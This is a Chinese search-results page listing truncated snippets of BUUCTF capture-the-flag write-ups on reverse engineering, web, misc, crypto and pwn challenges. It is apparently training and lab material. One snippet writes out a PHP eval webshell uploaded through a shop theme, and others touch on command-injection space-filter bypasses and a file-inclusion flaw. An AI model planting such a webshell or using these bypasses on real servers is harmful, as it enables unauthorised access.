”BUUCTF刷题记录“ 的搜索结果

     无壳,拖进ida, 然后进入sub_78A这个关键函数里去看,有点迷宫的感觉,起点为(0,0) 这里”0“是我们移动停止的条件,注意v2+=v4这一句,由于这是在while循环里的,所以他是一直以同一个方向移动的,直到碰到了...

     [GKCTF2020]Check_1n 进入程序 用IDA搜索字符串 View-Open subviews-Strings(视图-打开子视图-字符串) 找到 ...用上下左右控制里面的上下左右,空格键控制确认, 切换到打砖块程序,将光标控制至里面的回车键,用空格...

     查壳后无壳,ida打开,逻辑很简单 根据最后的判断条件可以反推 说明一点,dup是 所以上面dword_40f040最后那个 8 dup(0) 的数据不是8,而是零(我之前按照8搞的一直是错的) #include <stdio.h>...

     迷宫题的新花样 打开感觉就是个迷宫题 然后 根据判断条件,#应该是终点,o应该是起点 有了迷宫了,就差上下左右走的条件了,这里我看了好长时间没看出来 ,看了别人的wp才知道这里由于是sys文件,是由键盘过滤...

     下载后是一个pyc文件,在线反编译一下得到源码 print 'Welcome to Re World!' print 'Your input1 is your flag~' l = len(input1) for i in range(l): num = ((input1[i] + i) % 128 + 128) % 128 #元素+下标,与...

     [GKCTF2020]老八小超市儿 进入网址 admin.php进入后台 账号admin 密码shopxo 应用中心——应用商城——主题 下载默认主题 编写一个a.php文件放进默认主题 a.php文件内容 <?php @eval($_POST[a]);...

     无壳,ida打开, 上网查了查traversal 然后看到最上面上面有左右指针,感觉有点像二叉树遍历 打开type1和type2 结合两个函数,第一个应该是中序遍历,第二个应该是后序遍历 然后去找字符串,找半天没找到,就...

     没有加壳,打开 有两个关键函数,sub-4010f0和sub-401050 看到两个’\n’,’\t’猜想这个sub-4010f0函数应该是进行输入和排除掉’\n’,’\t’ 再看sub-401050: sub_401050函数就是将字符串逆向做了异或操作之后...

     经典无壳,拖进ida 最后输出的里面有衣穿加密字符串,一看就知道是base加密的,然后提上又提示是base64加密,拿去解密发现不对,感觉应该是吧base64的码表改了 然后找半天没找到那个函数, 然后找到这个奇怪的函数...

     打开看是一整个程序,刚开始感觉和那个坦克大战有点像(小憨包笑死) 怀疑是根据选择不同的材料来达到某种条件然后输出flag 先找到c#的资源文件 dnspy打开 点开以后 果然是根据根据点击材料来控制是否输出flag,...

     先查壳,没有壳,拖进ida,f12大法 发现敏感句子,进入,代码如下 signed __int64 sub_4009C6() { const char *v0; // rdi signed __int64 result; // rax __int64 v2; // ST10_8 __int64 v3;...

     C#程序,且用Eazfuscator.NET混淆了代码,于是用使用de4dot工具进行处理 处理完后用dnspy反编译,找到main函数(我找了老长时间,发现可以直接程序入口) 最后有提示:flag{str+text},那么再依次求出str和text ...

     WarmUp  首先查看源码,发现有source.php,跟进看看,发现了一堆代码 这个原本是phpmyadmin任意文件包含漏洞,这里面只不过是换汤不换药。 ...有兴趣的可以看一下之前我做的分析,htt...

     pingpingping 打开后发现要传ip,想到ping命令,先尝试传入127.1.1.1 .../?ip= fxck your space! 说明空格过滤。但是当我们绕过空格时,发现<,%09,$IFS都不起作用 ...原因是用 $IFS的话,会认为解析没结束,会把后面的...

     也就是说,这个shell文件告诉我们flag.zip的密码是创建flag.zip的时间戳,已知时间戳有10位和13位,然后结合zip的修改时间,猜测时间戳开头为155,那么用ARCHPR掩码爆破155?...然后看图片,是png可能是LSB隐写;...

     九连环 1.得到一个图片,放入stegsolve,format analysis发现pk,可能有压缩包,将图片放入kali,foremost一下,果然得到一个zip。 2.该zip文件也是加密的,爆破得不到,于是010editor发现是zip伪加密,(想知道具体...

     目录 流量中的线索 荷兰宽带数据泄露 后门查杀 webshell后门 被劫持的神秘礼物 流量中的线索 下载后解压是一个数据包 过滤http追踪http 导出文件 下载下来打开fenxi.php发现最后有= ...

     [BUUCTF 2018]Online Tool 题目: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_...

     buuctf刷题-Crypto-联想脑洞-达芬奇密码 给了两串数字和提示: (答案是一串32位十进制数字) 达芬奇隐藏在蒙娜丽莎中的数字列:1 233 3 2584 1346269 144 5 196418 21 1597 610 377 10946 89 514229 987 8 55 6765 ...

     哈哈哈,我又来刷题了,看了下BUUCTF上面的pwn题还真多。。。 test_your_nc ida查看,发现直接执行system,所以,直接交互就可以 //写下简单的脚本 from pwn import * p = remote('node3.buuoj.cn',28213) p....

10  
9  
8  
7  
6  
5  
4  
3  
2  
1